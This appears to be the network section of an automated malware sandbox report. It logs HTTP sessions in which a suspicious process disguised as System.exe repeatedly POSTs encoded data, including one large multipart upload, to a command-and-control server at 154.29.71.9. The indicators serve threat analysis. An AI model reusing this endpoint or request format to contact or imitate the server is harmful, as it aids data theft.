                                                                                                    Jan 4, 2025 14:54:41.413600922 CET8050201154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:41.546699047 CET8050201154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:41.546742916 CET5020180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:41.671590090 CET5020180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:41.671740055 CET5020280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:41.676546097 CET8050201154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:41.676559925 CET8050202154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:41.676604033 CET5020180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:41.676645041 CET5020280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:41.676728964 CET5020280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:41.681556940 CET8050202154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:42.205413103 CET8050202154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:42.364079952 CET5020280192.168.2.4154.29.71.9
                                                                                                    • 154.29.71.9
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:17.998841047 CET | 394 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 344
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:52:18.373143911 CET | 344 | OUT | (raw request body)
Jan 4, 2025 14:52:18.554953098 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:18.763582945 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:18.804034948 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:18 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
Jan 4, 2025 14:52:18.804054022 CET | 354 | IN | (raw response data)
Jan 4, 2025 14:52:18.915432930 CET | 370 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 384
                                                                                                    Expect: 100-continue
Jan 4, 2025 14:52:19.072777987 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:19.072988987 CET | 384 | OUT | (raw request body)
Jan 4, 2025 14:52:19.210980892 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Jan 4, 2025 14:52:19.211708069 CET  371  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:19.342773914 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:19.342953920 CET  2596  OUT  Data Raw: 5c 59 5d 5b 5b 5b 58 57 5b 59 5a 55 50 58 5b 52 56 52 54 41 52 5b 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \Y][[[XW[YZUPX[RVRTAR[RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:.=>1>U)??['T$+ Z.#>P5.3!6(>+$3<."Y ']/
                                                                                                    Jan 4, 2025 14:52:19.479918957 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0
                                                                                                    Jan 4, 2025 14:52:19.487931013 CET  371  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1468
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:19.618912935 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:19.619127035 CET  1468  OUT  Data Raw: 5c 5d 58 5f 5b 5e 58 52 5b 59 5a 55 50 5e 5b 5a 56 5c 54 44 52 51 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \]X_[^XR[YZUP^[ZV\TDRQRQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,92">><(-'$;$,95>?T"+5P(>/$#]-"Y ']/<
                                                                                                    Jan 4, 2025 14:52:19.837275982 CET  349  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 58 26 29 39 0e 26 2d 2f 0f 3a 3c 21 1a 2b 30 0b 1b 2e 3d 28 58 28 5c 28 06 3b 23 27 5b 3d 5e 36 08 3e 31 0a 0b 26 06 2c 5d 3f 0c 20 51 03 12 27 5b 32 07 07 05 29 1d 32 03 3a 10 3c 08 36 32 28 03 26 29 2e 10 35 04 32 03 26 2f 39 1f 2a 3f 39 55 2e 10 06 01 2d 1d 24 54 3e 2f 23 55 0b 1f 25 55 30 21 33 0e 31 38 1d 02 3c 0e 34 5f 3f 04 2b 53 37 04 2c 59 25 3e 3d 02 27 31 36 0f 24 57 25 58 27 1d 21 19 22 2e 38 01 31 00 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"X&)9&-/:<!+0.=(X(\(;#'[=^6>1&,]? Q'[2)2:<62(&).52&/9*?9U.-$T>/#U%U0!318<4_?+S7,Y%>='16$W%X'!".81.S.-W=YL0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    1  192.168.2.4  49733  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:52:19.005683899 CET  370  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 384
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:19.363811016 CET  384  OUT  Data Raw: 5c 5c 5d 5f 5b 55 5d 57 5b 59 5a 55 50 5e 5b 53 56 56 54 41 52 59 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \\]_[U]W[YZUP^[SVVTARYR^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^.>)X&;>Q>-(<-4']0/0=!-/68"=.8&4X-"Y ']/<
                                                                                                    Jan 4, 2025 14:52:19.526730061 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:19.658113003 CET  349  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 21 00 27 39 08 1c 32 3e 3f 0c 2e 3c 00 0a 2a 20 35 1c 38 3e 27 02 3f 03 24 05 3b 30 2f 12 3d 38 2e 0b 29 08 23 56 26 3c 2f 01 3c 0c 20 51 03 12 27 5b 25 07 04 5d 2b 23 26 02 2c 2e 28 41 35 22 27 1e 32 03 3e 10 22 3d 04 06 25 2f 2a 08 3d 06 21 51 2e 3e 2f 13 39 0d 3c 10 3f 05 23 55 0b 1f 25 56 30 31 33 0b 25 5e 20 10 28 20 30 13 2b 5c 2b 55 34 03 3c 11 31 3e 2e 5a 26 32 21 55 27 21 39 59 27 33 0b 16 23 2e 38 01 31 3a 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98!'92>?.<* 58>'?$;0/=8.)#V&</< Q'[%]+#&,.(A5"'2>"=%/*=!Q.>/9<?#U%V013%^ ( 0+\+U4<1>.Z&2!U'!9Y'3#.81:.S.-W=YL0
                                                                                                    Jan 4, 2025 14:52:19.737657070 CET  371  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:19.868134975 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:19.869843006 CET  2600  OUT  Data Raw: 5c 5d 58 50 5b 5c 58 52 5b 59 5a 55 50 5c 5b 53 56 51 54 40 52 5e 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \]XP[\XR[YZUP\[SVQT@R^RYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,X!%;>)='+-%8$_/U2!6+6)71:/"Y ']/4
                                                                                                    Jan 4, 2025 14:52:20.006005049 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    2  192.168.2.4  49736  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:52:20.221797943 CET  371  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:20.570363998 CET  2600  OUT  Data Raw: 59 5c 58 5c 5b 55 5d 50 5b 59 5a 55 50 50 5b 5a 56 52 54 49 52 50 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\X\[U]P[YZUPP[ZVRTIRPRZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^,1(1>='+[+3]?.3!=66*4&?."Y ']/
                                                                                                    Jan 4, 2025 14:52:20.739820004 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:20.870229959 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:20 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    3  192.168.2.4  49737  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:52:21.668365955 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:22.020023108 CET  2600  OUT  Data Raw: 59 5c 58 58 5b 54 5d 51 5b 59 5a 55 50 5e 5b 50 56 54 54 40 52 58 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\XX[T]Q[YZUP^[PVTT@RXR^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9[;>:182=$(=43 [8&V!#59T(.A29"Y ']/<
                                                                                                    Jan 4, 2025 14:52:22.194622993 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:22.324806929 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:22 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    4  192.168.2.4  49739  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:52:22.622785091 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:22.973128080 CET  2600  OUT  Data Raw: 5c 59 5d 5d 5b 59 58 5c 5b 59 5a 55 50 5d 5b 53 56 53 54 41 52 5b 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \Y]][YX\[YZUP][SVSTAR[R[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\986$(&*_<-';Z802"=3V#(U)$3 ./"Y ']/0
                                                                                                    Jan 4, 2025 14:52:23.148946047 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:23.279915094 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:23 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    5  192.168.2.4  49740  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:52:23.640535116 CET  441  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----8sMojQO808Z6RTnGrLBFDy69zHfnum3F37
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 139206
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:23.990158081 CET  12360  OUT  Data Raw: 2d 2d 2d 2d 2d 2d 38 73 4d 6f 6a 51 4f 38 30 38 5a 36 52 54 6e 47 72 4c 42 46 44 79 36 39 7a 48 66 6e 75 6d 33 46 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                    Data Ascii: ------8sMojQO808Z6RTnGrLBFDy69zHfnum3F37Content-Disposition: form-data; name="0"Content-Type: text/plain\[X_[U]S[YZUPP[TVWTIRXR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[
Jan 4, 2025 14:52:24.167165041 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:24.462846994 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:24 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49744 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:24.882196903 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1856
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49745 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:25.006479979 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:52:25.364029884 CET | 2600 | OUT | Data Raw: 59 5a 5d 5c 5b 5a 58 52 5b 59 5a 55 50 5a 5b 57 56 53 54 46 52 58 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YZ]\[ZXR[YZUPZ[WVSTFRXR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9.>)^%)0_?=3V'(0Z85>;Q6=.+&U?-/"Y ']/,
Jan 4, 2025 14:52:25.548212051 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:25.681894064 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49746 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:25.816062927 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
Jan 4, 2025 14:52:26.162619114 CET | 2600 | OUT | Data Raw: 5c 5a 58 5a 5b 5d 58 50 5b 59 5a 55 50 5e 5b 51 56 53 54 46 52 59 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZXZ[]XP[YZUP^[QVSTFRYRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;>>&8%) Z(43;/8U"P!.,58%).(E&3;9"Y ']/<
Jan 4, 2025 14:52:26.390369892 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:52:26.526015997 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:26 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
